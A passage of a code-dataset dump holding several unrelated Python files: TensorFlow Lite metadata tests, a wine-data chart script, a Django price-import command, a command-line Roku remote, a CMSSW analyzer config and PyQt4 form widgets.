str(error.exception))\n\n\nclass ClassificationTensorMdTest(tf.test.TestCase, parameterized.TestCase):\n\n _NAME = \"probability\"\n _DESCRIPTION = \"The classification result tensor.\"\n _LABEL_FILE_EN = \"labels.txt\"\n _LABEL_FILE_CN = \"labels_cn.txt\" # Locale label file in Chinese.\n _EXPECTED_FLOAT_TENSOR_JSON = \"../testdata/classification_tensor_float_meta.json\"\n _EXPECTED_UINT8_TENSOR_JSON = \"../testdata/classification_tensor_uint8_meta.json\"\n _EXPECTED_UNSUPPORTED_TENSOR_JSON = \"../testdata/classification_tensor_unsupported_meta.json\"\n\n @parameterized.named_parameters(\n {\n \"testcase_name\": \"float\",\n \"tensor_type\": _schema_fb.TensorType.FLOAT32,\n \"golden_json\": _EXPECTED_FLOAT_TENSOR_JSON\n }, {\n \"testcase_name\": \"uint8\",\n \"tensor_type\": _schema_fb.TensorType.UINT8,\n \"golden_json\": _EXPECTED_UINT8_TENSOR_JSON\n }, {\n \"testcase_name\": \"unsupported_tensor_type\",\n \"tensor_type\": _schema_fb.TensorType.INT16,\n \"golden_json\": _EXPECTED_UNSUPPORTED_TENSOR_JSON\n })\n def test_create_metadata_should_succeed(self, tensor_type, golden_json):\n label_file_en = metadata_info.LabelFileMd(\n file_path=self._LABEL_FILE_EN, locale=\"en\")\n label_file_cn = metadata_info.LabelFileMd(\n file_path=self._LABEL_FILE_CN, locale=\"cn\")\n tesnor_md = metadata_info.ClassificationTensorMd(\n name=self._NAME,\n description=self._DESCRIPTION,\n label_files=[label_file_en, label_file_cn],\n tensor_type=tensor_type)\n tensor_metadata = tesnor_md.create_metadata()\n\n metadata_json = _metadata.convert_to_json(\n _create_dummy_model_metadata(tensor_metadata))\n expected_json = test_utils.load_file(golden_json, \"r\")\n self.assertEqual(metadata_json, expected_json)\n\n\nclass CategoryTensorMdTest(tf.test.TestCase, parameterized.TestCase):\n\n _NAME = \"category\"\n _DESCRIPTION = \"The category tensor.\"\n _LABEL_FILE_EN = \"labels.txt\"\n _LABEL_FILE_CN = \"labels_cn.txt\" # Locale label file in Chinese.\n _EXPECTED_TENSOR_JSON = \"../testdata/category_tensor_float_meta.json\"\n\n def test_create_metadata_should_succeed(self):\n label_file_en = metadata_info.LabelFileMd(\n file_path=self._LABEL_FILE_EN, locale=\"en\")\n label_file_cn = metadata_info.LabelFileMd(\n file_path=self._LABEL_FILE_CN, locale=\"cn\")\n tesnor_md = metadata_info.CategoryTensorMd(\n name=self._NAME,\n description=self._DESCRIPTION,\n label_files=[label_file_en, label_file_cn])\n tensor_metadata = tesnor_md.create_metadata()\n\n metadata_json = _metadata.convert_to_json(\n _create_dummy_model_metadata(tensor_metadata))\n expected_json = test_utils.load_file(self._EXPECTED_TENSOR_JSON, \"r\")\n self.assertEqual(metadata_json, expected_json)\n\n\ndef _create_dummy_model_metadata(\n tensor_metadata: _metadata_fb.TensorMetadataT) -> bytes:\n # Create a dummy model using the tensor metadata.\n subgraph_metadata = _metadata_fb.SubGraphMetadataT()\n subgraph_metadata.inputTensorMetadata = [tensor_metadata]\n model_metadata = _metadata_fb.ModelMetadataT()\n model_metadata.subgraphMetadata = [subgraph_metadata]\n\n # Create the Flatbuffers object and convert it to the json format.\n builder = flatbuffers.Builder(0)\n builder.Finish(\n model_metadata.Pack(builder),\n _metadata.MetadataPopulator.METADATA_FILE_IDENTIFIER)\n return bytes(builder.Output())\n\n\nif __name__ == \"__main__\":\n tf.test.main()\n","sub_path":"tensorflow_lite_support/metadata/python/tests/metadata_writers/metadata_info_test.py","file_name":"metadata_info_test.py","file_ext":"py","file_size_in_byte":10552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"96331801","text":"# program name: an1_health.py\n\n# no optional arguments: Uses Wine data to display information about whether certain \n# classes are higher in healthy attributes\n# \n# output: side-by-side bar charts\n\nprint('========================================================================================')\nprint('========================================================================================')\n\nprint('> start of program wine_analysis2.py')\nprint('> import libraries')\n\nimport argparse\nimport os.path as op\nimport csv\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport numpy as np\nfrom numpy.polynomial.polynomial import polyfit\n\nprint('> define convert_type function')\ndef convert_type(data_value):\n try:\n return int(data_value)\n except ValueError:\n try:\n return float(data_value)\n except ValueError:\n return data_value\n\nprint(\"> define get_delim function\")\ndef get_delim(sourcefile1):\n print('> executing get_delim function')\n data = open(sourcefile1, 'r') \n my_read_data = data.read()\n if my_read_data.find(',') > 0:\n print(' delimiter: comma')\n return ','\n else:\n print(' delimiter: space')\n return ' ' \n print(' ')\n\ndef lines_to_dict(lines, header=False):\n print('> executing lines_to_dict')\n # column_titles = ['Class','Alcohol','Malic acid','Ash','Alcalinity of ash','Magnesium','Total phenols','Flavanoids','Nonflavanoid phenols','Proanthocyanins','Color intensity','Hue',\n # 'OD280/OD315 of diluted wines','Proline']\n column_titles = ['class','alc','ma','ash','alkash','mg','tphen','flav','nfphen','pac','ci','hue',\n 'od','proline']\n \n data_dict = {}\n for idx, column in enumerate(column_titles):\n data_dict[column] = []\n for row in lines:\n data_dict[column] += [row[idx]]\n return data_dict\n\ndef parse_file(data_file, dlm, debug=False): # took delimiter out\n print('> executing parse_file')\n # Verify the file exists\n assert(op.isfile(data_file))\n\n # open it as a csv \n with open(data_file, 'r') as fhandle:\n csv_reader = csv.reader(fhandle, delimiter=dlm)\n # Add each line in the file to a list\n lines = []\n if debug:\n count = 0\n for line in csv_reader:\n if debug:\n if count > 2:\n break\n count += 1\n newline = []\n for value in line:\n newline += [convert_type(value)]\n if len(newline) > 0:\n lines += [newline]\n\n print('> view a few lines')\n print(' ')\n for line in lines[0:2]:\n print(line)\n print(' ')\n # Return all the contents of our file\n return lines\n\n\n# class','alc','ma','ash','alkash','mg','tphen','flav','nfphen','pac','ci','hue',\n# 'od','proline\n# attributes with health benefits: ma mg tphen proline\n\ndef plot_means(dd):\n df = pd.DataFrame(dd, columns = ['class','ma', 'mg', 'tphen', 'proline']) \n #print(df)\n c1 = df.loc[(df['class'] == 1) ] \n c2 = df.loc[(df['class'] == 2) ]\n c3 = df.loc[(df['class'] == 3) ] \n # get means of each health attribute by class\n mean_dict = {'class':[1,2,3],\n 'ma': [c1['ma'].mean(), c2['ma'].mean(), c3['ma'].mean()],\n 'mg': [c1['mg'].mean(), c2['mg'].mean(), c3['mg'].mean()],\n 'tphen': [c1['tphen'].mean(), c2['tphen'].mean(), c3['tphen'].mean()],\n 'proline': [c1['proline'].mean(), c2['proline'].mean(), c3['proline'].mean()] } \n # print(mean_dict)\n mean_df = pd.DataFrame(mean_dict)\n print(mean_df)\n\n labels = ['Class 1', 'Class 2', 'Class 3']\n x = np.arange(len(labels)) # the label locations\n width = 0.2 # the width of the bars\n fig, ax = plt.subplots()\n\n rects1 = ax.bar(x -0.3, mean_df['ma'], width, label='Malic Acid', color='firebrick')\n rects2 = ax.bar(x -0.1, mean_df['mg']/100, width, label='Magnesium/100', color='rebeccapurple')\n rects3 = ax.bar(x + 0.1, mean_df['tphen'], width, label='Total Phenols',color='olivedrab')\n rects4 = ax.bar(x + 0.3, mean_df['proline']/1000, width, label = 'Proline/1000', color = 'saddlebrown')\n\n ax.set_ylabel('Mean Values of Attributes')\n ax.set_title('Mean Values of Beneficial Attributes for Each Class')\n ax.set_xticks(x)\n ax.set_xticklabels(labels)\n ax.legend()\n\n plt.savefig(\"an1_health.png\")\n plt.show()\n\ndef main():\n\n data_file = \"wine.data\"\n dlm = get_delim(data_file) \n my_data = parse_file(data_file, dlm)\n data_dictionary = lines_to_dict(my_data)\n #print(data_dictionary)\n\n plot_means(data_dictionary)\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"evp001/an1_health.py","file_name":"an1_health.py","file_ext":"py","file_size_in_byte":4708,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"91417903","text":"from django.core.management.base import BaseCommand, CommandError\nfrom apps.catalogue.models import Product, AttributeOption, AttributeOptionGroup\nfrom oscar.apps.partner.models import StockRecord\nfrom lxml import etree\nfrom zapas.settings import PRODUCT_XML\n\n\nclass Command(BaseCommand):\n help = 'get price and color_name from xls file and save it to db'\n\n def handle(self, *args, **options):\n try:\n attrgroup = AttributeOptionGroup.objects.get(name=u'Цвет')\n except:\n attrgroup = AttributeOptionGroup.objects.create(name=u'Цвет')\n attrgroup.save()\n for i in AttributeOption.objects.filter(group=attrgroup):\n i.delete()\n xml = etree.parse(PRODUCT_XML).getroot()\n all_prods = Product.objects.filter(structure='parent')\n for product in all_prods:\n try:\n xml_product = xml.xpath('*//product[@id=\"%s\"]'%product.upc)[0]\n except:\n self.stdout.write('Some error!!!')\n continue\n color = xml_product.find('product_color').text\n price = xml_product.find('product_prices/price_uah').text\n childs = Product.objects.filter(parent=product)\n for child in childs:\n stock = StockRecord.objects.get(product=child)\n stock.price_excl_tax = price\n stock.save()\n\n try:\n attrcolorname = AttributeOption.objects.get(group=attrgroup, option=color)\n except:\n try:\n attrcolorname = AttributeOption.objects.create(group=attrgroup, option=color)\n attrcolorname.save()\n except:\n continue\n\n product.attr.color = attrcolorname\n product.attr.color = color\n\n product.save()\n self.stdout.write('product %s changed!!!' % product.upc)","sub_path":"main/management/commands/colorprice.py","file_name":"colorprice.py","file_ext":"py","file_size_in_byte":1922,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"236485632","text":"import sys; import socket; import time; import re; import xml.etree.ElementTree; import urllib;\nif sys.version_info[0]>2:raw_input=input\nhelpMessage=\"\"\"Commands:\nhome; 'Home' key\ntype:args; Sends text to roku\nleft; 'left' key\nright; 'right' key\nup; 'up' key\ndown; 'down' key\nselect; 'OK' key\nok; 'OK' key\nrw; 'rewind (<<)' key\nrewind; 'rewind (<<)' key\nffw; 'Fast Forward (>>)' key\nfastforward; 'Fast Forward (>>)' key\nbackspace; 'backspace' key\nbksp; 'backspace' key\nclear; Backspace 150 times\n\"\"\"\nssdpMessage=\"\"\"M-SEARCH * HTTP/1.1\nHost: 239.255.255.250:1900\nMan: \"ssdp:discover\"\nST: roku:ecp\n\n\"\"\"\ndef urlencode(x):\n\tif sys.version_info[0] < 3:return urllib.quote_plus(x)\n\telse:return urllib.parse.quote_plus(x)\n#Gets device version\ndef getRokuType(rokuIP):\n\ttry:\n\t\ts=socket.socket(socket.AF_INET, socket.SOCK_STREAM); s.connect((rokuIP, 8060));\n\t\ts.send(\"GET /query/device-info HTTP/1.1\\r\\n\\r\\n\")\n\t\tcontentLentgh=int(re.findall(r'\\r\\nContent-Length: (\\d+)\\r\\n', str(s.recv(1024)))[0])\n\t\trokuData=xml.etree.ElementTree.fromstring(str(s.recv(contentLentgh)))\n\t\treturn rokuData.find(\"model-name\").text\n\texcept Exception:return getRokuType(rokuIP)\n#Sends commands to rokus\ndef sendCommand(rokuIP, command):\n\ts=socket.socket(socket.AF_INET, socket.SOCK_STREAM); s.connect((rokuIP, 8060));\n\ts.send(\"POST /\"+command+\" HTTP/1.1\\r\\n\\r\\n\");\ndef sendText(rokuIP, text):\n\tfor char in text:\n\t\tsendCommand(rokuIP, \"keypress/lit_\"+urlencode(char))\n\t\ttime.sleep(0.1)\n#Discovers rokus\ndef discoverRokus():\n\ts=socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n\ts.sendto(ssdpMessage, (\"239.255.255.250\", 1900));\n\ts.settimeout(1)\n\ttry: return re.findall(r'LOCATION: http://(.*):8060', str(s.recvfrom(1024)))[0]\n\texcept socket.timeout: return None\n#Repetitevly scans for x seconds\ndef scanRokus(seconds):\n\tstartTime=time.time()\n\tallRokus=[]\n\twhile(time.time()=(sys.argv.index(\"--scan\")+2):\n\t\ttry: eval(sys.argv[sys.argv.index(\"--scan\")+1])\n\t\texcept Exception: print(\"Invalid expression or number\")\n\t\tscanRokus(eval(sys.argv[sys.argv.index(\"--scan\")+1])) #Optionally change eval() to int()\n\telse: print(\"Seconds for scan required (example: 'RokuRemote --scan 1.5')\")\n\tsys.exit()\nif \"--ip\" in sys.argv:\n\tif len(sys.argv)<(sys.argv.index(\"--ip\")+2):\n\t\trokuIP=sys.argv[sys.argv.index(\"--scan\")+1]\n\telse:print(\"No ip given after --ip\"); sys.exit()\n#User selects roku here\nif selectedRokuIP==None:\n\tprint(\"Scanning... (10 Seconds)\\n\")\n\tallRokus=scanRokus(10)\n\tfor index, rokuIP in enumerate(allRokus):\n\t\tprint(str(index)+\":\\nIP: '\"+rokuIP+\"'\\nType: '\"+getRokuType(rokuIP)+\"'\\n\")\n\tsys.stdout.write(\"Enter Selected Roku Number: \")\n\twhile 1:\n\t\ttry:selectedRokuIP=allRokus[eval(raw_input())]; break\n\t\texcept Exception: print(\"\\nInvalid expression or number\"); sys.stdout.write(\"Enter Selected Roku Number: \")\n\tprint(\"Using Roku IP: '\"+rokuIP+\"'\")\nelse:print(\"Using Pre-Set IP: '\"+rokuIP+\"'\")\nprint(\"Type q/quit to quit, or h/help for more commands\")\n#Main Loop Here\nwhile 1:\n\tcommand=raw_input()\n\tif command==\"q\" or command==\"quit\": sys.exit()\n\telif command==\"h\" or command==\"help\": print(helpMessage)\n\telif command==\"up\": sendCommand(rokuIP, \"keypress/Up\")\n\telif command==\"down\": sendCommand(rokuIP, \"keypress/Down\")\n\telif command==\"left\": sendCommand(rokuIP, \"keypress/Left\")\n\telif command==\"right\": sendCommand(rokuIP, \"keypress/Right\")\n\telif command==\"select\" or command==\"ok\": sendCommand(rokuIP, \"keypress/Select\")\n\telif command==\"rw\" or command==\"rewind\": sendCommand(rokuIP, \"keypress/Rev\")\n\telif command==\"ffw\" or command==\"fastforward\": sendCommand(rokuIP, \"keypress/Fwd\")\n\telif command==\"home\": sendCommand(rokuIP, \"keypress/Home\")\n\telif command[0:5]==\"text:\": sendText(rokuIP, command[5:])\n\telif command==\"back\": sendCommand(rokuIP, \"keypress/Back\")\n\telif command==\"backspace\" or command==\"bksp\": sendCommand(rokuIP, \"keypress/Backspace\")\n\telif command==\"play\" or command==\"pause\": sendCommand(rokuIP, \"keypress/Play\")\n\telif command==\"clear\":\n\t\tfor i in xrange(150):\n\t\t\tsendCommand(rokuIP, \"keypress/Backspace\")\n#TODO: Implement all commands\n\telse:print(\"Bad command\")","sub_path":"Python/Command Line/RokuRemote.py","file_name":"RokuRemote.py","file_ext":"py","file_size_in_byte":4339,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"36068306","text":"import FWCore.ParameterSet.Config as cms\nfrom Validation.RecoTrack.TrackingParticleSelectionForEfficiency_cfi import * \nfrom SimTracker.TrackAssociation.LhcParametersDefinerForTP_cfi import * \nFlatTreeProducerBDT = cms.EDAnalyzer('FlatTreeProducerBDT',\n lookAtAntiS = cms.untracked.bool(False),\n runningOnData = cms.untracked.bool(False),\n beamspot = cms.InputTag(\"offlineBeamSpot\"),\n offlinePV = cms.InputTag(\"offlinePrimaryVertices\",\"\",\"\"),\n genCollection_GEN = cms.InputTag(\"genParticles\",\"\",\"GEN\"),\n genCollection_SIM_GEANT = cms.InputTag(\"genParticlesPlusGEANT\",\"\",\"\"),\n generalTracksCollection = cms.InputTag(\"generalTracks\",\"\",\"RECO\"),\n sexaqCandidates = cms.InputTag(\"lambdaKshortVertexFilter\", \"sParticles\",\"\"),\n V0KsCollection = cms.InputTag(\"generalV0Candidates\",\"Kshort\",\"\"),\n V0LCollection = cms.InputTag(\"generalV0Candidates\",\"Lambda\",\"\"),\n)\n","sub_path":"SexaQAnalysis/AnalyzerAllSteps/python/FlatTreeProducerBDT_cfi.py","file_name":"FlatTreeProducerBDT_cfi.py","file_ext":"py","file_size_in_byte":889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"164774816","text":"# encoding: utf-8\n# version: $Id: Widgets.py 276 2008-01-14 17:28:08Z jraedler $\n# author: Joerg Raedler \n# license: GPL v2\n\nfrom PyQt4.QtGui import QDialog, QDialogButtonBox, QVBoxLayout, QGridLayout, QLabel, QLineEdit,\\\n QComboBox, QSpinBox, QDoubleSpinBox, QWidget, QCheckBox, QScrollArea, QTextEdit,\\\n QListWidget, QAbstractItemView, QDateTimeEdit, QHBoxLayout, QSizePolicy, QToolButton\nfrom PyQt4.QtCore import QCoreApplication, SIGNAL, Qt, QObject, QDateTime\n\nfrom RTypes import Text, MLText, Choice, MultiChoice, Float, Integer, Bool, DateTime\n\n\nrichTypeClasses = {\n unicode(QCoreApplication.translate('RichTypes.Qt4Widgets', 'Simple Text')): Text,\n unicode(QCoreApplication.translate('RichTypes.Qt4Widgets', 'Multiline Text')): MLText,\n unicode(QCoreApplication.translate('RichTypes.Qt4Widgets', 'Single Choice')): Choice,\n unicode(QCoreApplication.translate('RichTypes.Qt4Widgets', 'Multiple Choice')): MultiChoice,\n unicode(QCoreApplication.translate('RichTypes.Qt4Widgets', 'Boolean')): Bool,\n unicode(QCoreApplication.translate('RichTypes.Qt4Widgets', 'Integer')): Integer,\n unicode(QCoreApplication.translate('RichTypes.Qt4Widgets', 'Float')): Float,\n unicode(QCoreApplication.translate('RichTypes.Qt4Widgets', 'Date+Time')): DateTime\n}\n\n\nclass RichTypesWidget(QWidget):\n\n def __init__(self, parent=None):\n QWidget.__init__(self, parent)\n self.setSizePolicy(QSizePolicy.Minimum, QSizePolicy.Expanding)\n self.gridLayout = QGridLayout(self)\n self.richTypes = []\n self.qwidgets = []\n self.qlabels = []\n\n def addRichTypes(self, l):\n \"\"\"set the list of richtypes\"\"\"\n for q in l:\n i = len(self.richTypes)\n self.richTypes.append(q)\n l = QLabel(self)\n self.qlabels.append(l)\n l.setText(q.name)\n l.setSizePolicy(QSizePolicy.Minimum, QSizePolicy.MinimumExpanding)\n l.setToolTip(q.descr)\n self.gridLayout.addWidget(l, i, 0, 1, 1)\n cls = q.__class__\n if cls == Text:\n w = QLineEdit(self)\n w.setMinimumSize(300, 30)\n if q.maxLen: w.setMaxLength(q.maxLen)\n w.setText(q.v)\n elif cls == MLText:\n w = QTextEdit(self)\n w.setAcceptRichText(False)\n w.setMinimumSize(300, 60)\n w.setText(q.v)\n elif cls == Choice:\n w = QComboBox(self)\n c = [unicode(x) for x in q.choices]\n c.sort()\n w.addItems(c)\n idx = w.findText(unicode(q.v))\n if idx >= 0:\n w.setCurrentIndex(idx)\n elif cls == MultiChoice:\n w = QListWidget(self)\n w.setSelectionMode(QAbstractItemView.MultiSelection)\n w.setMinimumSize(100, 60)\n c = [unicode(x) for x in q.choices]\n c.sort()\n v = [unicode(x) for x in q.v]\n for ii, s in enumerate(c):\n w.addItem(s)\n if s in v:\n w.item(ii).setSelected(True)\n elif cls == Bool:\n w = QCheckBox(self)\n if q.v:\n w.setCheckState(Qt.Checked)\n else:\n w.setCheckState(Qt.Unchecked)\n elif cls == Integer:\n w = QSpinBox(self)\n if q.min is not None:\n w.setMinimum(q.min)\n if q.max is not None:\n w.setMaximum(q.max)\n if q.step is not None:\n w.setSingleStep(q.step or 0.01)\n if q.unit: w.setSuffix(' '+q.unit)\n w.setValue(q.v)\n elif cls == Float:\n w = QDoubleSpinBox(self)\n if q.min is not None:\n w.setMinimum(q.min)\n if q.max is not None:\n w.setMaximum(q.max)\n w.setSingleStep(q.step or 0.01)\n if q.unit: w.setSuffix(' '+q.unit)\n w.setValue(q.v)\n elif cls == DateTime:\n w = QDateTimeEdit(self)\n w.setCalendarPopup(True)\n dt = QDateTime()\n dt.setTime_t(q.v)\n w.setDateTime(dt)\n if q.min is not None:\n mindt = QDateTime()\n mindt.setTime_t(q.min)\n w.setMinimumDate(mindt.date())\n if q.max is not None:\n maxdt = QDateTime()\n maxdt.setTime_t(q.max)\n w.setMaximumDate(maxdt.date())\n l.setBuddy(w)\n w.setToolTip(q.descr)\n w.setSizePolicy(QSizePolicy.Minimum, QSizePolicy.Expanding)\n w.adjustSize()\n self.gridLayout.addWidget(w, i, 1, 1, 1)\n self.qwidgets.append(w)\n self.adjustSize()\n\n\n def delRichTypes(self, *names):\n \"\"\"delete RichTypes by name, widgets get disabled but not deleted\"\"\"\n qq = [q for q in self.richTypes if q and q.name in names]\n for q in qq:\n i = self.richTypes.index(q)\n self.richTypes[i] = None\n self.qwidgets[i].setEnabled(False)\n self.qlabels[i].setEnabled(False)\n\n\n def applyChanges(self):\n for i in range(len(self.richTypes)):\n q = self.richTypes[i]\n if q is not None:\n w = self.qwidgets[i]\n cls = q.__class__\n if cls == Text:\n q.set(unicode(w.text()))\n elif cls == MLText:\n q.set(unicode(w.toPlainText()))\n elif cls == Choice:\n q.set(unicode(w.currentText()))\n elif cls == MultiChoice:\n q.set([unicode(ii.text()) for ii in w.selectedItems()])\n elif cls == Bool:\n q.set(w.checkState() == Qt.Checked)\n elif cls == DateTime:\n q.set(w.dateTime().toTime_t())\n else:\n q.set(w.value()) # Integer, Float\n return [q for q in self.richTypes if q is not None]\n\n\n\nclass SimpleRichTypesDialog(QDialog):\n \"\"\"Simple dialog to display and change RichTypes\"\"\"\n\n def __init__(self, parent=None, windowTitle='', scrolling=True, text=''):\n QDialog.__init__(self, parent)\n self.mainLayout = QVBoxLayout(self)\n self.textLabel = QLabel(self)\n self.textLabel.setText(text)\n self.mainLayout.addWidget(self.textLabel)\n if scrolling:\n self.scrollArea = QScrollArea(self)\n self.mainLayout.addWidget(self.scrollArea)\n self.richTypesWidget = RichTypesWidget(self.scrollArea)\n self.scrollArea.setWidget(self.richTypesWidget)\n self.scrollArea.setWidgetResizable(False)\n else:\n self.richTypesWidget = RichTypesWidget(self)\n self.mainLayout.addWidget(self.richTypesWidget)\n self.buttonBox = QDialogButtonBox(self)\n self.buttonBox.setOrientation(Qt.Horizontal)\n self.buttonBox.setStandardButtons(QDialogButtonBox.Cancel | QDialogButtonBox.NoButton | QDialogButtonBox.Ok)\n self.mainLayout.addWidget(self.buttonBox)\n QObject.connect(self.buttonBox, SIGNAL('accepted()'), self.accept)\n QObject.connect(self.buttonBox, SIGNAL('rejected()'), self.reject)\n self.setWindowTitle(windowTitle)\n self.result = None\n\n def addRichTypes(self, l):\n \"\"\"set the list of richtypes\"\"\"\n self.richTypesWidget.addRichTypes(l)\n\n def accept(self):\n \"\"\"after dialog closes, RichType list is available as self.result\"\"\"\n self.result = self.richTypesWidget.applyChanges()\n QDialog.accept(self)\n\n\n\nclass ComplexRichTypesDialog(SimpleRichTypesDialog):\n \"\"\"complex dialog to display, change, add or delete RichTypes\"\"\"\n\n def __init__(self, parent=None, windowTitle='', scrolling=True, text=''):\n SimpleRichTypesDialog.__init__(self, parent, windowTitle, scrolling, text)\n self.editButtonLayout = QHBoxLayout()\n self.mainLayout.insertLayout(2, self.editButtonLayout)\n self.addButton = QToolButton(self)\n self.addButton.setText(QCoreApplication.translate('RichTypes.Qt4Widgets', 'Add'))\n self.editButtonLayout.addWidget(self.addButton)\n self.delButton = QToolButton(self)\n self.delButton.setText(QCoreApplication.translate('RichTypes.Qt4Widgets', 'Delete'))\n self.editButtonLayout.addWidget(self.delButton)\n self.editButtonLayout.addStretch(100)\n self.connect(self.addButton, SIGNAL('pressed()'), self.newRichType)\n self.connect(self.delButton, SIGNAL('pressed()'), self.delRichTypes)\n\n\n def newRichType(self):\n N = Text('Name', 'new_item', maxLen=100)\n D = Text('Description', '-empty-', maxLen=300)\n clsNames = richTypeClasses.keys()\n T = Choice('Type', clsNames[0], choices=clsNames,\n descr=QCoreApplication.translate('RichTypes.Qt4Widgets', 'Select type'))\n txt = QCoreApplication.translate('RichTypes.Qt4Widgets', 'Select name, description and type')\n dlg = SimpleRichTypesDialog(self, windowTitle=QCoreApplication.translate('RichTypes.Qt4Widgets',\n 'New Item'), text=txt, scrolling=False)\n dlg.addRichTypes((N, D, T))\n if not dlg.exec_():\n return\n name = dlg.result[0].v\n while name in [q.name for q in self.richTypesWidget.richTypes if q]:\n name = name + 'X'\n descr = dlg.result[1].v\n cls = richTypeClasses[dlg.result[2].v]\n if cls in (Choice, MultiChoice):\n C = MLText('choices', '')\n txt = QCoreApplication.translate('RichTypes.Qt4Widgets', 'Enter choices (one per line)')\n dlg = SimpleRichTypesDialog(self, windowTitle=QCoreApplication.translate('RichTypes.Qt4Widgets',\n 'Choices'), text=txt, scrolling=False)\n dlg.addRichTypes((C,))\n if dlg.exec_():\n choices = [c for c in dlg.result[0].v.split('\\n') if c]\n self.richTypesWidget.addRichTypes((cls(name, descr=descr, choices=choices), ))\n elif cls == Float:\n # FIXME: adjust fMin, fMax\n fMin = -1e+10\n fMax = 1e+10\n MIN = Float('min', fMin, min=fMin, max=fMax)\n MAX = Float('max', fMax, min=fMin, max=fMax)\n STEP = Float('step', 1, min=0, max=fMax)\n txt = QCoreApplication.translate('RichTypes.Qt4Widgets', 'Enter properties')\n dlg = SimpleRichTypesDialog(self, windowTitle=QCoreApplication.translate('RichTypes.Qt4Widgets',\n 'Properties'), text=txt, scrolling=False)\n dlg.addRichTypes((MIN, MAX, STEP))\n if dlg.exec_():\n self.richTypesWidget.addRichTypes((Float(name, descr=descr, min=MIN.v, max=MAX.v, step=STEP.v), ))\n elif cls == Integer:\n # FIXME: adjust iMin, iMax\n iMin = -1e+5\n iMax = 1e+5\n MIN = Integer('min', iMin, min=iMin, max=iMax)\n MAX = Integer('max', iMax, min=iMin, max=iMax)\n STEP = Integer('step', 1, min=0, max=iMax)\n txt = QCoreApplication.translate('RichTypes.Qt4Widgets', 'Enter properties')\n dlg = SimpleRichTypesDialog(self, windowTitle=QCoreApplication.translate('RichTypes.Qt4Widgets',\n 'Properties'), text=txt, scrolling=False)\n dlg.addRichTypes((MIN, MAX, STEP))\n if dlg.exec_():\n self.richTypesWidget.addRichTypes((Integer(name, descr=descr, min=MIN.v, max=MAX.v, step=STEP.v), ))\n elif cls == DateTime:\n tMax = 2147483647\n MIN = DateTime('min', 0, min=0, max=tMax)\n MAX = DateTime('max', tMax, min=0, max=tMax)\n txt = QCoreApplication.translate('RichTypes.Qt4Widgets', 'Enter properties')\n dlg = SimpleRichTypesDialog(self, windowTitle=QCoreApplication.translate('RichTypes.Qt4Widgets',\n 'Properties'), text=txt, scrolling=False)\n dlg.addRichTypes((MIN, MAX))\n if dlg.exec_():\n self.richTypesWidget.addRichTypes((DateTime(name, descr=descr, min=MIN.v, max=MAX.v), ))\n elif cls in (Text, MLText):\n ML = Integer('maxLen', 1000, min=0, max=1e+5, step=1)\n txt = QCoreApplication.translate('RichTypes.Qt4Widgets', 'Enter properties')\n dlg = SimpleRichTypesDialog(self, windowTitle=QCoreApplication.translate('RichTypes.Qt4Widgets',\n 'Properties'), text=txt, scrolling=False)\n dlg.addRichTypes((ML,))\n if dlg.exec_():\n self.richTypesWidget.addRichTypes((cls(name, descr=descr, maxLen=ML.v), ))\n else:\n self.richTypesWidget.addRichTypes((cls(name, descr=descr), ))\n\n\n def delRichTypes(self):\n qnames = [q.name for q in self.richTypesWidget.richTypes if q is not None]\n Q = MultiChoice('Items', [], choices=qnames, descr=QCoreApplication.translate('RichTypes.Qt4Widgets',\n 'RichTypes to delete'))\n txt = QCoreApplication.translate('RichTypes.Qt4Widgets', 'Select items to delete')\n dlg = SimpleRichTypesDialog(self, windowTitle=QCoreApplication.translate('RichTypes.Qt4Widgets',\n 'Delete items'), text=txt, scrolling=False)\n dlg.addRichTypes((Q,))\n if dlg.exec_():\n delNames = dlg.result[0].v\n self.richTypesWidget.delRichTypes(*delNames)\n\n\n\ndef testDialogs():\n import time\n tmp = ['Entry '+str(i) for i in range(10)]\n rt = []\n rt.append(Text('text', 'default text', descr='some text', maxLen=15))\n rt.append(Choice('choice', tmp[4], descr='you choose!', choices=tmp))\n rt.append(Integer('int', 42, descr='integer number', min=39, max=50, step=3, unit='kWh'))\n rt.append(Float('float', 42.42, descr='float number'))\n rt.append(Bool('bool', True, descr='boolean value'))\n rt.append(MLText('mltext', 'default text\\non two\\nlines', descr='some multiline text'))\n rt.append(MultiChoice('mchoice', (tmp[3], tmp[7]), descr='choose one or more', choices=tmp))\n rt.append(DateTime('datetime', int(time.time()), descr='date and time'))\n txt = 'Test of RichTypes.Qt4Widgets.ComplexRichTypesDialog'\n dlg = ComplexRichTypesDialog(None, windowTitle='Complex Test', text=txt, scrolling=True)\n dlg.addRichTypes(rt)\n if dlg.exec_():\n rt = dlg.result\n txt = 'Test of RichTypes.Qt4Widgets.SimpleRichTypesDialog'\n dlg = SimpleRichTypesDialog(None, windowTitle='Simple Test', text=txt, scrolling=True)\n dlg.addRichTypes(rt)\n if dlg.exec_():\n rt = dlg.result\n\n\n\nif __name__ == '__main__':\n import sys\n from PyQt4.QtGui import QApplication\n app = QApplication(sys.argv)\n testDialogs()\n #sys.exit(app.exec_())\n","sub_path":"Misc/RichTypes/Qt4Widgets.py","file_name":"Qt4Widgets.py","file_ext":"py","file_size_in_byte":14979,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"652029433","text":"from __future__ import print_function, absolute_import, division #makes KratosMultiphysics backward compatible with python 2.6 and 2.7\nfrom KratosMultiphysics import *\nfrom KratosMultiphysics.DEMApplication import *\nfrom KratosMultiphysics.SwimmingDEMApplication import *\n\nimport sphere_strategy\nBaseStrategy = sphere_strategy.ExplicitStrategy\n\nclass SwimmingStrategy(BaseStrategy):\n\n def IntegrationSchemeTranslator(self, name):\n class_name = BaseStrategy.IntegrationSchemeTranslator(self, name)\n\n if name == 'Hybrid_Bashforth':\n class_name = 'HybridBashforthScheme'\n\n return class_name\n\n def GetSchemeInstance(self, class_name): # parent counterpart must not be called due to different 'globals()'\n return globals().get(class_name)()\n\n def Initialize(self):\n 